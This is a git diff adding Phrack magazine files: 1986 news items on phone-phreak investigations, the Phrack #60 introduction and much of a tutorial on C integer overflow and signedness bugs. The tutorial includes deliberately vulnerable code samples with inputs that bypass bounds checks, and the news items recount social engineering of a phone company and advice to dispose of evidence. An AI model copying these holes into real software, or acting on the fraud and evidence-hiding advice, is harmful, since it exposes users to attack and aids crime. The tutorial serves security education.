+As far as Kleptic Palace AE, the calls in question were made on 2/9/86 5:12 AM,
+2/9/86 4:33 PM, and 2/10/86 7:30 AM.  Although no specific order is mentioned.
+The times of the calls made to Metal Shop AE are not available.  A third place
+called was the home of TWCB Inc.  At the time of these calls Whackoland was
+still up.
+
+The agent expected all of them to have a caller log on the board but of course
+neither of their AEs kept caller logs.  Not to mention the fact that no one
+would kept a caller log for three months anyway.
+
+Kleptic Wizard got a message to Taran King which was then sent to me, and
+within the hour I arrived at Klepto's house where I discovered the FBI still
+around, so after killing another 45 minutes, I went inside and met with Klepto.
+Mr. Nowicki had left behind two things, his business card and a list of four
+suspects that he was specifically trying to bust.  Apparently all four had been
+caught for Wylon abuse in the past.
+
+I recognized the name at the top of the list almost instantly and as a result,
+saved a fellow phreak from a possible bust.  Two of the others are rumored to
+have been warned as well.  However if this is untrue then the other three still
+may be in great danger as of this writing.  All of the suspects live in the
+Wyoming/Colorado area.
+
+The homes of Cheap Shades and Kleptic Wizard were not searched and their boards
+were not looked at.  The FBI agent even declined an invitation from Kleptic
+Wizard to see the bbs.  This may be because he didn't have a warrant.
+
+                            Information provided by
+                        Kleptic Wizard and Cheap Shades
+_______________________________________________________________________________
+
+Administration Nominations?                                         May 6, 1986
+---------------------------
+In late April 1986, The Administration decided to have their yearly membership
+drive for the group. The phreaks/hackers being voted on for membership
+included:
+
+     Blade Runner/Jester Sluggo/Knight Lightning/Oryan Quest/Phlash Gordon
+         Recent Change/Sally Ride/Slave Driver/Taran King/The Marauder
+
+Many of the above and others had thought that they had been voted into the
+Administration without even being asked.  However this was not the case.
+
+David Lightman stated that the nominations were made public so that the
+Administration members would know of the vote taking place on Administration
+BBS
+1.  Once the nominations were voted on, then the phreaks/hacks would be
+formally invited.
+
+I now pose an important question.  If David Lightman is the only regular board
+caller of the Administration, then how would the other members know how to
+vote?
+
+So far the results of the votes have not been made public.  Not that it matters
+that much because The Administration has now more or less completely fallen
+apart.  It would appear that this new membership drive was an attempt to revive
+the group with new blood.  However the group has been revived on its own, since
+the formers members regrouped again...at least temporarily.
+
+                  Some Information Provided by David Lightman
+_______________________________________________________________________________
+
+Trouble in Texas                                                   June 2, 1986
+----------------
+In the last week of May, David Lightman, decided to do a credimatic check on
+Blade Runner.  To his great surprise, he found that Blade Runner worked for
+Southwestern Bell Security.  He confronted Blade Runner with this information
+and shortly afterward received a visit from Southwestern Bell Security, who
+confiscated his terminal programs, his user files, notebooks, and g-phile
+disks. He claims that his user files and g-philes were scrambled so no one
+should worry too much.
+
+Later that day, Sir Gamelord, sysop of World's Grave Elite, called David
+Lightman and said that Blade Runner was on the board and acting really strange.
+David Lightman told him what happened and they then hung up.  The next day
+Blade Runner is a cosysop of World's Grave Elite as well as Thieve's
+Underground, sysoped by Jack The Ripper.  Now Sir Gamelord denies the incident
+ever occurred.  At this writing, David Lightman is laying low and retiring from
+the phreak world until things clear up.
+
+Sir Gamelord's side to this story is quite different.  Sir Gamelord said that
+he, Blade Runner, and Jack the Ripper were forming a group called the
+P.H.I.R.M. (see Phrack Pro-Phile 3 this issue) and that Lightman wanted to be
+in and to lead the group as a subsidiary of The Administration (like Team
+Hackers'86).  They refused, and took away his cosysop access on their boards.
+Sir Gamelord says that Lightman is making this whole Southwestern Bell Security
+story up to get revenge on them.
+
+However, Lightman claims that he was asked to be a member of The P.H.I.R.M.,
+but refused because he didn't have the time.  He did however recommend Digital
+Logic, Ford Prefect, and The Lineman (sysop of the Lost City Of Atlantis).
+
+David Lightman has since received his disks back but will not be around on
+boards very much. The decision is up to you.  I will try to get more
+information out on boards as soon as possible.
+
+            Information provided by David Lightman and Sir Gamelord
+_______________________________________________________________________________
+
+Ninja NYC/Sigmund Fraud; Close Calls
+------------------------------------
+Sigmund Fraud, famous for his incredible proficiency at "social engineering" is
+now laying incredibly low after what is considered the closest call of his
+life.
+
+The following must be regarded as pure rumor for the sake of non-incrimination
+of those involved.  You readers know what I mean.
+-------------------------------------------------------------------------------
+The story goes like this, Sigmund Fraud and a friend (the same one who went to
+the Telepub'86 meeting in New York, however he has no handle) were able to
+convince their local Bell company that they were another part of the same
+company and were able to acquire; Call Forwarding, Call Waiting, Speed Calling,
+and Three Way Calling on to Sigmud Fraud's personal phone line.  Since SF's
+friend lived in a Cross Bar (X-Bar) area he could not get these services so
+they decided to get them for Ninja NYC.  They told him about it later.
+
+Less than a week later, on the first Thursday of May 1986, Ninja NYC came home
+to discover 2 telco agents awaiting his return from school.  What it boiled
+down to was that "he" had committed several felonies and to make matters worse,
+the people at the local Bell company identified Ninja NYC's voice as being the
+caller, AND HE ISN'T THE ONE WHO MADE THE CALL!!!!   What it finally boiled
+down to was that Ninja NYC had really received a very scary personal warning.
+
+About this same time Sigmund Fraud is getting home and to his great dismay, all
+of his new found phone features have been turned off!!?!  Sometime later (most
+likely after the telco agents had left) Sigmund gets a call from Ninja NYC.
+Ninja NYC of course tells him everything that had happened and warned him that
+he was next.  Sigmund immediately called me.  We both thought Sigmund was
+doomed and would be picked up very soon.
+
+However this was not the case. The agents didn't show up and Sigmund had been
+given a golden opportunity to dump all his illegal items and get his story
+right.  That night I received a call from Slave Driver and Sigmund call me on
+three-way and we discussed what to do next.  The problem was that Sigmund
+didn't want to get rid of his illegal items.  He had boxes, manuals, notebooks,
+and even a PBX in his room.  I told he had 2 choices; Choice A:  SF gets rid of
+his shit somewhere anywhere, and the telcos don't get any more evidence or,
+Choice B:  SF leaves the stuff where it is, the telcos come over and take it
+and SF gets nailed worse.
+
+When I left the conversation SF was still discussing what he should do.  The
+next day, he was not visited by the telcos, he was not busted, but instead
+received a call from his local bell company and was given a very strong verbal
+warning.
+
+Since that time, He has stopped answering his personal phone and believes that
+line to be monitored.  Ninja NYC is almost definitely being monitored and
+people have been asked not to call him.
+
+Of course that didn't stop Daniel Zigmond from calling him.  This was in an
+attempt to help Sigmund Fraud, but regardless may have done more damage than
+good.
+
+                            Information Provided by
+                  Sigmund Fraud/Slave Driver/Knight Lightning
+_______________________________________________________________________________
+
+Telecomputist; Printed Newsletter                                  June 8, 1986
+----------------------------------
+From: Forest Ranger and "TeleComputist" staff,
+To:  You!
+
+I have drafted the idea for a newsletter and I stress the word newsletter.
+TWCB had promised everyone a 40+, glossy page magazine for an outrageous
+amount.  I do not want to say that we are taking TAP over because we are not,
+but instead making amends for what TWCB did not do.  To show our sincerity we
+will be offering the first issue free.  It will be your basic newsletter with
+exceptional articles from experienced phone phreaks, computer hackers, and
+telecom buffs.  Each issue will be a set four pages but since this is the grand
+opening issue it will be longer (20 pages).  For the first free issue please
+send a postage paid, self addressed envelope to:
+
+                           TeleComputist Newsletter
+                                 P.O. Box 2003
+                             Florissant, Mo. 63032
+
+Also, please send subscriptions to the same address.  The subscription fee
+for the newsletter will be twelve dollars a year, fifty cents for back issues.
+This is a monthly circulation and we encourage letters.
+
+The "TeleComputist" Staff includes:
+
+                     Forest Ranger/Data Line/Reverend Enge
+       Ax Murderer/Chris Jones/Knight Lightning/Taran King/Mad Molester
+
+                 Information Provided by Telecomputist Staff
+_______________________________________________________________________________
diff --git a/phrack60/1.txt b/phrack60/1.txt
new file mode 100644
index 0000000..319e9cd
--- /dev/null
+++ b/phrack60/1.txt
@@ -0,0 +1,180 @@
+                              ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x01 of 0x10
+
+[-]==========================================================================[-]
+
+               _.                      _
+              *  `.__________________.'_'._       ___ ___
+           /|_____/`._____:    /_____     `._____/  //  /_______|\
+          /      \  _`._  \   //   _ \____  `.     //  /  .*      \
+         (        \ \  `. /  /_\  /__/   /  / /.__     \.'         )
+          \  _____/  \___`.     )    \  :  /  \ `.  \   \_______  /
+           \|    /___/ /___/.__/__/\__\___/\_____/_._\____\     |/
+                           `-' pHRACK#6o          `-'
+
+[-]==========================================================================[-]
+
+
+Jingle bells jingle bells jingle all the way...X-MAS TIME IS PHRACK-MAS TIME.
+
+Wow, number #60 is out. Who ever thought that we will get that far :> Let's
+take a look back in time who kept phrack going over all these years. Ladies
+and gentlemen, we are proud to present the final, latest, incomplete and
+maybe incorrect PHRACK EDITOR IN CHIEF TIMELINE BACK TO THE BEGINNING:
+
+DATE        NAME                                        PHRACKZ
+----------+-------------------------------------------+--------------------
+2001-08-11                                              (p57..)
+1997-09-01 route                                        (p51..p56)
+1997-04-09 route, Datastream Cowboy                     (p50)
+1996-11-08 route, Datastream Cowboy, Voyager            (p49)
+1996-09-01 Voyager, ReDragon, route                     (p48)
+1993-03-01 Erik Bloodaxe                                (p42..p47)
+1991-09-15 Dispater                                     (p33..p41)
+1990-05-28 Crimson Death                                (p31..p32)
+1988-10-12 Taran King + Knight Lightning                (p20..p30)
+1988-06-07 Crimson Death                                (p18..p19)
+1988-04-07 Shooting Shark                               (p17)
+1987-11-01 Elric of Imrryr                              (p16)
+1985-11-17 Taran King + Knight Ligthning                (p01..p15)
+--[[[ BEGIN OF SPACE & TIME - CREATION OF THE UNIVERSE - THE GENESIS ]]]---
+
+..we came a long way...
+---------------------------------------------------------------------------
+
+
+What's new?
+
+We revived Phrack Prophile to honor those who did some kewl stuff for
+the scene.
+
+This issue comes with a new section dedicated to tool annoucements
+(Phrack armory). It showcases selected tools that have been released during
+the last few month and that we consider cool enough to be mentioned here.
+
+
+
+|=[ Table of Contents ]=-------------------------------------------------=|
+| 0x01 Introduction                                 Phrack Staff 0x009 kb |
+| 0x02 Loopback                                     Phrack Staff 0x00b kb |
+| 0x03 Linenoise                                    Phrack Staff 0x01e kb |
+| 0x04 Toolz Armory                                 Packet Storm 0x00b kb |
+| 0x05 Phrack Prophile on horizon                   Phrack Staff 0x009 kb |
+| 0x06 Smashing The Kernel Stack For Fun And Profit         noir 0x03e kb |
+| 0x07 Burning the bridge: Cisco IOS exploits                 FX 0x028 kb |
+| 0x08 Static Kernel Patching                             jbtzhm 0x072 kb |
+| 0x09 Big Loop Integer Protection                 Oded Horovitz 0x067 kb |
+| 0x0a Basic Integer Overflows                            blexim 0x01b kb |
+| 0x0b SMB/CIFS By The Root                                ledin 0x07c kb |
+| 0x0c Firewall Spotting with broken CRC                    Ed3f 0x026 kb |
+| 0x0d Low Cost and Portable GPS Jammer                anonymous 0x021 kb |
+| 0x0e Traffic Lights                                   plunkett 0x015 kb |
+| 0x0f Phrack World News                            Phrack Staff 0x018 kb |
+| 0x10 Phrack magazine extraction utility           Phrack Staff 0x015 kb |
+|=------------------------------------------------------------=[ 0x282 kb |
+
+
+  The latest, and all previous, phrack issues are available online at
+http://www.phrack.org. Readers without web access can subscribe to the
+phrack-distrib mailinglist. Every new phrack is sent as email attachment
+to this list. Every new phrack issue (without the attachment) is announced
+on the announcement mailinglist.
+
+To subscribe to the announcement mailinglist:
+$ mail announcement-subscribe@lists.phrack.org < /dev/null
+
+To subscribe to the distribution mailinglist:
+$ mail distrib-subscribe@lists.phrack.org < /dev/null
+
+To retrieve older issues (must subscribe first):
+$ mail distrib-index@lists.phrack.org < /dev/null
+$ mail distrib-get.<n>@lists.phrack.org < /dev/null
+where n indicated the phrack issue [1..60].
+
+
+Enjoy the magazine!
+
+Phrack Magazine Vol 11 Number 60, Build 3, Dec 28, 2002. ISSN 1068-1035
+Contents Copyright (c) 2002 Phrack Magazine.  All Rights Reserved.
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors. 
+Phrack Magazine is made available to the public, as often as possible, free
+of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : phrackstaff@phrack.org
+Submissions       : phrackstaff@phrack.org
+Commentary        : loopback@phrack.org
+Phrack World News : pwn@phrack.org
+
+  We have some agressive /dev/null-style mail filter running. We do reply
+to every serious email. If you did not get a reply, then your mail was 
+probably not worth an answer or was caught by our mailfilter. Make sure 
+your mail has a non-implicit destination, one recipient, a non-empty 
+subject field, and does not contain any html code and is 100% 7bit clean
+pure ascii.
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.6 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+mQGiBD03YTYRBADYg6kOTnjEfrMANEGmoTLqxRZdfxGpvaU5MHPq+XHvuFAWHBm2
+xB/9ZcRt4XIXw0OTL441ixL6fvGPNxjrRmAUtXSWrElGJ5lTj7VdJmdt/DbehzGb
+NXekehG/r6KLHX0PqNzcr84sY6/GrZUiNZftYA/eUWDB7EjEmkBIMs3bnwCg3KRb
+96G68Zc+T4ebUrV5/dkYwFUEAMgSGJpdy8yBWaFUsGOsGkrZZfdf6tRA+GGOnqjS
+Lh094L8iuTfbxr7zO4E5+uToantAl56fHhnEy7hKJxuQdW1C0GKktUDhGltUxrob
+zsNdN6cBprUT7//QgdOlm3nE2E5myozhhMxLMjjFl1mNo1YrNUEU4tYWm/Zvg9OF
+Te8TBADS4oafB6pT9BhGOWhoED1bQRkk/KdHuBMrgwK8vb/e36p6KMj8xBVJNglY
+JtIn6Iv14z8PtO62SEzlcgdsieoVncztQgLIrvCN+vKjv8jEGFtTmIhx6f/VC7pX
+oLX2419rePYaXCPVhw3xDN2CVahUD9jTkFE2eOSFiWJ7DqUsIrQkcGhyYWNrc3Rh
+ZmYgPHBocmFja3N0YWZmQHBocmFjay5vcmc+iFcEExECABcFAj03YTYFCwcKAwQD
+FQMCAxYCAQIXgAAKCRB73vey7F3HClWRAJ4qxMAMESfFb2Bbi+rAb0JS4LnSYwCZ
+AWI6ndU+sWEs/rdD78yydjPKW9q5Ag0EPTdhThAIAJNlf1QKtz715HIWA6G1CfKb
+ukVyWVLnP91C1HRspi5haRdyqXbOUulck7A8XrZRtDUmvMGMO8ZguEjioXdyvYdC
+36LUW8QXQM9BzJd76uUl/neBwNaWCHyiUqEijzkKO8yoYrLHkjref48yBF7nbgOl
+i1y3QOyDGUT/sEdjE5lzHqVtDxKH9B8crVkr/O2GEyr/zRu1Z2L5TjZNcQO988Hy
+CyBdDVsCBwUkdrm/oyqnSiypcGzumD4pYzmquUw1EYJOVEO+WeLAOrfhd15oBZMp
+QlQ/MOfc0rvS27YhKKFAHhSchSFLEppy/La6wzU+CW4iIcDMny5xw1wNv3vGrScA
+AwUH/jAo4KbOYm6Brdvq5zLcEvhDTKf6WcTLaTbdx4GEa8Sj4B5a2A/ulycZT6Wu
+D480xT8me0H4LKl2j7lzhJwzG9HRp846gKrPgj7GVcAaTtsXgwJu6Q7fH74PCrOt
+GEyvJw+hRiQCTHUC22FUAx6SHZ5KzwMs3W8QnNUbRBfbd1hPMaEJpUeBm/jeXSm4
+2JLOd9QjJu3fUIOzGj+G6MWvi7b49h/g0fH3M/LF5mPJfo7exaElXwk1ohyPjeb8
+s11m348C4JqmFKijAyuQ9vfS8cdcsYUoCrWQw/ZWUIYSoKJd0poVWaHQwuAWuSFS
+4C8wUicFDUkG6+f5b7wNjfW3hf2IRgQYEQIABgUCPTdhTgAKCRB73vey7F3HCq5e
+AJ4+jaPMQEbsmMfa94kJeAODE0XgXgCfbvismsWSu354IBL37BtyVg9cxAo=
+=9kWD
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/10.txt b/phrack60/10.txt
new file mode 100644
index 0000000..fda2d07
--- /dev/null
+++ b/phrack60/10.txt
@@ -0,0 +1,776 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x0a of 0x10
+
+
+|=--------------------=[ Basic Integer Overflows ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ by blexim <blexim@hush.com> ]=-------------------=|
+
+1: Introduction
+    1.1 What is an integer?
+    1.2 What is an integer overflow?
+    1.3 Why can they be dangerous?
+
+2: Integer overflows
+    2.1 Widthness overflows
+        2.1.1 Exploiting
+    2.2 Arithmetic overflows
+        2.2.1 Exploiting
+
+3: Signedness bugs
+    3.1 What do they look like?
+        3.1.1 Exploiting
+    3.2 Signedness bugs caused by integer overflows
+
+4: Real world examples
+    4.1 Integer overflows
+    4.2 Signedness bugs
+
+
+--[ 1.0 Introduction
+
+In this paper I'm going to describe two classes of programming bugs which
+can sometimes allow a malicious user to modify the execution path of an
+affected process.  Both of these classes of bug work by causing variables
+to contain unexpected values, and so are not as "direct" as classes which
+overwrite memory, e.g. buffer overflows or format strings.  All the
+examples given in the paper are in C, so a basic familiarity with C is
+assumed.  A knowledge of how integers are stored in memory is also useful,
+but not essential.
+
+
+----[ 1.1 What is an integer?
+
+An integer, in the context of computing, is a variable capable of
+representing a real number with no fractional part.  Integers are typically
+the same size as a pointer on the system they are compiled on (i.e. on a 32
+bit system, such as i386, an integer is 32 bits long, on a 64 bit system,
+such as SPARC, an integer is 64 bits long).  Some compilers don't use
+integers and pointers of the same size however, so for the sake of
+simplicity all the examples refer to a 32 bit system with 32 bit integers,
+longs and pointers.
+
+Integers, like all variables are just regions of memory.  When we talk
+about integers, we usually represent them in decimal, as that is the
+numbering system humans are most used to.  Computers, being digital, cannot
+deal with decimal, so internally to the computer integers are stored in
+binary.  Binary is another system of representing numbers which uses only
+two numerals, 1 and 0, as opposed to the ten numerals used in decimal.  As
+well as binary and decimal, hexadecimal (base sixteen) is often used in
+computing as it is very easy to convert between binary and hexadecimal.
+
+Since it is often necessary to store negative numbers, there needs to be a
+mechanism to represent negative numbers using only binary.  The way this is
+accomplished is by using the most significant bit (MSB) of a variable to
+determine the sign: if the MSB is set to 1, the variable is interpreted as
+negative; if it is set to 0, the variable is positive.  This can cause some
+confusion, as will be explained in the section on signedness bugs, because
+not all variables are signed, meaning they do not all use the MSB to
+determine whether they are positive or negative.  These variable are known
+as unsigned and can only be assigned positive values, whereas variables
+which can be either positive or negative are called unsigned.
+
+
+----[ 1.2 What is an integer overflow?
+
+Since an integer is a fixed size (32 bits for the purposes of this paper),
+there is a fixed maximum value it can store.  When an attempt is made to
+store a value greater than this maximum value it is known as an integer
+overflow.  The ISO C99 standard says that an integer overflow causes
+"undefined behaviour", meaning that compilers conforming to the standard
+may do anything they like from completely ignoring the overflow to aborting
+the program.  Most compilers seem to ignore the overflow, resulting in an
+unexpected or erroneous result being stored.
+
+
+----[ 1.3 Why can they be dangerous?
+
+Integer overflows cannot be detected after they have happened, so there is
+not way for an application to tell if a result it has calculated previously
+is in fact correct.  This can get dangerous if the calculation has to do
+with the size of a buffer or how far into an array to index.  Of course
+most integer overflows are not exploitable because memory is not being
+directly overwritten, but sometimes they can lead to other classes of bugs,
+frequently buffer overflows.  As well as this, integer overflows can be
+difficult to spot, so even well audited code can spring surprises.
+
+
+
+--[ 2.0 Integer overflows
+
+So what happens when an integer overflow does happen?  ISO C99 has this to
+say:
+
+    "A computation involving unsigned operands can never overflow,
+    because a result that cannot be represented by the resulting unsigned
+    integer type is reduced modulo the number that is one greater than
+    the largest value that can be represented by the resulting type."
+
+NB: modulo arithmetic involves dividing two numbers and taking the
+remainder,
+e.g.
+    10 modulo 5 = 0
+    11 modulo 5 = 1
+so reducing a large value modulo (MAXINT + 1) can be seen as discarding the
+portion of the value which cannot fit into an integer and keeping the rest.
+In C, the modulo operator is a % sign.
+</NB>
+
+This is a bit wordy, so maybe an example will better demonstrate the
+typical "undefined behaviour":
+
+We have two unsigned integers, a and b, both of which are 32 bits long.  We
+assign to a the maximum value a 32 bit integer can hold, and to b we assign
+1.  We add a and b together and store the result in a third unsigned 32 bit
+integer called r:
+
+    a = 0xffffffff
+    b = 0x1
+    r = a + b
+
+Now, since the result of the addition cannot be represented using 32 bits,
+the result, in accordance with the ISO standard, is reduced modulo
+0x100000000.
+
+    r = (0xffffffff + 0x1) % 0x100000000
+    r = (0x100000000) % 0x100000000 = 0
+
+Reducing the result using modulo arithmetic basically ensures that only the
+lowest 32 bits of the result are used, so integer overflows cause the
+result to be truncated to a size that can be represented by the variable.
+This is often called a "wrap around", as the result appears to wrap around
+to 0.
+
+
+----[ 2.1 Widthness overflows
+
+So an integer overflow is the result of attempting to store a value in a
+variable which is too small to hold it.  The simplest example of this can
+be demonstrated by simply assigning the contents of large variable to a
+smaller one:
+
+    /* ex1.c - loss of precision */
+    #include <stdio.h>
+
+    int main(void){
+            int l;
+            short s;
+            char c;
+
+            l = 0xdeadbeef;
+            s = l;
+            c = l;
+
+            printf("l = 0x%x (%d bits)\n", l, sizeof(l) * 8);
+            printf("s = 0x%x (%d bits)\n", s, sizeof(s) * 8);
+            printf("c = 0x%x (%d bits)\n", c, sizeof(c) * 8);
+
+            return 0;
+    }
+    /* EOF */
+
+The output of which looks like this:
+
+    nova:signed {48} ./ex1
+    l = 0xdeadbeef (32 bits)
+    s = 0xffffbeef (16 bits)
+    c = 0xffffffef (8 bits)
+
+Since each assignment causes the bounds of the values that can be stored in
+each type to be exceeded, the value is truncated so that it can fit in the
+variable it is assigned to.
+
+It is worth mentioning integer promotion here.  When a calculation
+involving operands of different sizes is performed, the smaller operand is
+"promoted" to the size of the larger one.  The calculation is then
+performed with these promoted sizes and, if the result is to be stored in
+the smaller variable, the result is truncated to the smaller size again.
+For example:
+
+    int i;
+    short s;
+
+    s = i;
+
+A calculation is being performed with different sized operands here.  What
+happens is that the variable s is promoted to an int (32 bits long), then
+the contents of i is copied into the new promoted s.  After this, the
+contents of the promoted variable are "demoted" back to 16 bits in order to
+be saved in s.  This demotion can cause the result to be truncated if it is
+greater than the maximum value s can hold.
+
+------[ 2.1.1 Exploiting
+
+Integer overflows are not like most common bug classes.  They do not allow
+direct overwriting of memory or direct execution flow control, but are much
+more subtle.  The root of the problem lies in the fact that there is no way
+for a process to check the result of a computation after it has happened,
+so there may be a discrepancy between the stored result and the correct
+result.  Because of this, most integer overflows are not actually
+exploitable.  Even so, in certain cases it is possible to force a crucial
+variable to contain an erroneous value, and this can lead to problems later
+in the code.
+
+Because of the subtlety of these bugs, there is a huge number of situations
+in which they can be exploited, so I will not attempt to cover all
+exploitable conditions.  Instead, I will provide examples of some
+situations which are exploitable, in the hope of inspiring the reader in
+their own research :)
+
+Example 1:
+
+    /* width1.c - exploiting a trivial widthness bug */
+    #include <stdio.h>
+    #include <string.h>
+
+    int main(int argc, char *argv[]){
+            unsigned short s;
+            int i;
+            char buf[80];
+
+            if(argc < 3){
+                    return -1;
+            }
+
+            i = atoi(argv[1]);
+            s = i;
+
+            if(s >= 80){            /* [w1] */
+                    printf("Oh no you don't!\n");
+                    return -1;
+            }
+
+            printf("s = %d\n", s);
+
+            memcpy(buf, argv[2], i);
+            buf[i] = '\0';
+            printf("%s\n", buf);
+
+            return 0;
+    }
+
+
+While a construct like this would probably never show up in real life code,
+it serves well as an example.  Take a look at the following inputs:
+
+    nova:signed {100} ./width1 5 hello
+    s = 5
+    hello
+    nova:signed {101} ./width1 80 hello
+    Oh no you don't!
+    nova:signed {102} ./width1 65536 hello
+    s = 0
+    Segmentation fault (core dumped)
+
+The length argument is taken from the command line and held in the integer
+i.  When this value is transferred into the short integer s, it is
+truncated if the value is too great to fit into s (i.e. if the value is
+greater than 65535).  Because of this, it is possible to bypass the bounds
+check at [w1] and overflow the buffer.  After this, standard stack smashing
+techniques can be used to exploit the process.
+
+
+----[ 2.2 Arithmetic overflows
+
+As shown in section 2.0, if an attempt is made to store a value in an
+integer which is greater than the maximum value the integer can hold, the
+value will be truncated.  If the stored value is the result of an
+arithmetic operation, any part of the program which later uses the result
+will run incorrectly as the result of the arithmetic being incorrect.
+Consider this example demonstrating the wrap around shown earlier:
+
+    /* ex2.c - an integer overflow */
+    #include <stdio.h>
+
+    int main(void){
+            unsigned int num = 0xffffffff;
+
+            printf("num is %d bits long\n", sizeof(num) * 8);
+            printf("num = 0x%x\n", num);
+            printf("num + 1 = 0x%x\n", num + 1);
+
+            return 0;
+    }
+    /* EOF */
+
+The output of this program looks like this:
+
+    nova:signed {4} ./ex2
+    num is 32 bits long
+    num = 0xffffffff
+    num + 1 = 0x0
+
+Note:
+The astute reader will have noticed that 0xffffffff is decimal -1, so it
+appears that we're just doing
+1 + (-1) = 0
+Whilst this is one way at looking at what's going on, it may cause some
+confusion since the variable num is unsigned and therefore all arithmetic
+done on it will be unsigned.  As it happens, a lot of signed arithmetic
+depends on integer overflows, as the following demonstrates (assume both
+operands are 32 bit variables):
+
+-700       + 800   = 100
+0xfffffd44 + 0x320 = 0x100000064
+
+Since the result of the addition exceeds the range of the variable, the
+lowest 32 bits are used as the result.  These low 32 bits are 0x64, which
+is equal to decimal 100.
+</note>
+
+Since an integer is signed by default, an integer overflow can cause a
+change in signedness which can often have interesting effects on subsequent
+code.  Consider the following example:
+
+    /* ex3.c - change of signedness */
+    #include <stdio.h>
+
+    int main(void){
+            int l;
+
+            l = 0x7fffffff;
+
+            printf("l = %d (0x%x)\n", l, l);
+            printf("l + 1 = %d (0x%x)\n", l + 1 , l + 1);
+
+            return 0;
+    }
+    /* EOF */
+
+The output of which is:
+
+    nova:signed {38} ./ex3
+    l = 2147483647 (0x7fffffff)
+    l + 1 = -2147483648 (0x80000000)
+
+Here the integer is initialised with the highest positive value a signed
+long integer can hold.  When it is incremented, the most significant bit
+(indicating signedness) is set and the integer is interpreted as being
+negative.
+
+Addition is not the only arithmetic operation which can cause an integer to
+overflow.  Almost any operation which changes the value of a variable can
+cause an overflow, as demonstrated in the following example:
+
+    /* ex4.c - various arithmetic overflows */
+    #include <stdio.h>
+
+    int main(void){
+            int l, x;
+
+            l = 0x40000000;
+
+            printf("l = %d (0x%x)\n", l, l);
+
+            x = l + 0xc0000000;
+            printf("l + 0xc0000000 = %d (0x%x)\n", x, x);
+
+            x = l * 0x4;
+            printf("l * 0x4 = %d (0x%x)\n", x, x);
+
+            x = l - 0xffffffff;
+            printf("l - 0xffffffff = %d (0x%x)\n", x, x);
+
+            return 0;
+    }
+    /* EOF */
+
+Output:
+
+    nova:signed {55} ./ex4
+    l = 1073741824 (0x40000000)
+    l + 0xc0000000 = 0 (0x0)
+    l * 0x4 = 0 (0x0)
+    l - 0xffffffff = 1073741825 (0x40000001)
+
+The addition is causing an overflow in exactly the same way as the first
+example, and so is the multiplication, although it may seem different.  In
+both cases the result of the arithmetic is too great to fit in an integer,
+so it is reduced as described above.  The subtraction is slightly
+different, as it is causing an underflow rather than an overflow: an
+attempt is made to store a value lower than the minimum value the integer
+can hold, causing a wrap around.  In this way we are able to force an
+addition to subtract, a multiplication to divide or a subtraction to add.
+
+------[ 2.2.1 Exploiting
+
+One of the most common ways arithmetic overflows can be exploited is when a
+calculation is made about how large a buffer must be allocated.  Often a
+program must allocate space for an array of objects, so it uses the
+malloc(3) or calloc(3) routines to reserve the space and calculates how
+much space is needed by multiplying the number of elements by the size of
+an object.  As has been previously shown, if we are able to control either
+of these operands (number of elements or object size) we may be able to
+mis-size the buffer, as the following code fragment shows:
+
+    int myfunction(int *array, int len){
+        int *myarray, i;
+
+        myarray = malloc(len * sizeof(int));    /* [1] */
+        if(myarray == NULL){
+            return -1;
+        }
+
+        for(i = 0; i < len; i++){              /* [2] */
+            myarray[i] = array[i];
+        }
+
+        return myarray;
+    }
+
+This seemingly innocent function could bring about the downfall of a system
+due to its lack of checking of the len parameter.  The multiplication at
+[1] can be made to overflow by supplying a high enough value for len, so we
+can force the buffer to be any length we choose.  By choosing a suitable
+value for len, we can cause the loop at [2] to write past the end of the
+myarray buffer, resulting in a heap overflow.  This could be leveraged into
+executing arbitrary code on certain implementations by overwriting malloc
+control structures, but that is beyond the scope of this article.
+
+Another example:
+
+    int catvars(char *buf1, char *buf2, unsigned int len1,
+                unsigned int len2){
+        char mybuf[256];
+
+        if((len1 + len2) > 256){    /* [3] */
+            return -1;
+        }
+
+        memcpy(mybuf, buf1, len1);      /* [4] */
+        memcpy(mybuf + len1, buf2, len2);
+
+        do_some_stuff(mybuf);
+
+        return 0;
+    }
+
+In this example, the check at [3] can be bypassed by using suitable values
+for len1 and len2 that will cause the addition to overflow and wrap around
+to a low number.  For example, the following values:
+
+    len1 = 0x104
+    len2 = 0xfffffffc
+
+when added together would result in a wrap around with a result of 0x100
+(decimal 256).  This would pass the check at [3], then the memcpy(3)'s at
+[4] would copy data well past the end of the buffer.
+
+
+
+--[ 3 Signedness Bugs
+
+Signedness bugs occur when an unsigned variable is interpreted as signed,
+or when a signed variable is interpreted as unsigned.  This type of
+behaviour can happen because internally to the computer, there is no
+distinction between the way signed and unsigned variables are stored.
+Recently, several signedness bugs showed up in the FreeBSD and OpenBSD
+kernels, so there are many examples readily available.
+
+
+----[ 3.1 What do they look like?
+
+Signedness bugs can take a variety of forms, but some of the things to look
+out for are:
+* signed integers being used in comparisons
+* signed integers being used in arithmetic
+* unsigned integers being compared to signed integers
+
+Here is classic example of a signedness bug:
+
+    int copy_something(char *buf, int len){
+        char kbuf[800];
+
+        if(len > sizeof(kbuf)){         /* [1] */
